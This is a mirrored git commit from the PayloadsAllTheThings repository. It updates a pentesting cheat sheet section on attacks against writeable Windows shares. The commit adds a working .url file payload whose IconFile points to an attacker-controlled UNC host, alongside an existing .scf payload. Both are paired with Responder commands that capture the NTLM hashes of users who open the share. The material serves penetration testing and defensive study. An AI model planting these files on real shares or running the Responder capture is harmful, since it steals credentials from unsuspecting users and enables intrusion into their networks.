mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
.url file in writeable share
This commit is contained in:
parent
3a384c34aa
commit
639dc9faec
@ -264,9 +264,9 @@ smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
|
||||
sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder
|
||||
```
|
||||
|
||||
### SCF file attack against writeable share
|
||||
### SCF and URL file attack against writeable share
|
||||
|
||||
Drop the following `something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
|
||||
Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
|
||||
|
||||
```powershell
|
||||
[Shell]
|
||||
@ -276,6 +276,17 @@ IconFile=\\10.10.XX.XX\Share\test.ico
|
||||
Command=ToggleDesktop
|
||||
```
|
||||
|
||||
This attack also works with `.url` files and `responder -I eth0 -v`.
|
||||
|
||||
```powershell
|
||||
[InternetShortcut]
|
||||
URL=whatever
|
||||
WorkingDirectory=whatever
|
||||
IconFile=\\192.168.1.29\%USERNAME%.icon
|
||||
IconIndex=1
|
||||
```
|
||||
|
||||
|
||||
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
|
||||
|
||||
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
||||
|
Loading…
Reference in New Issue
Block a user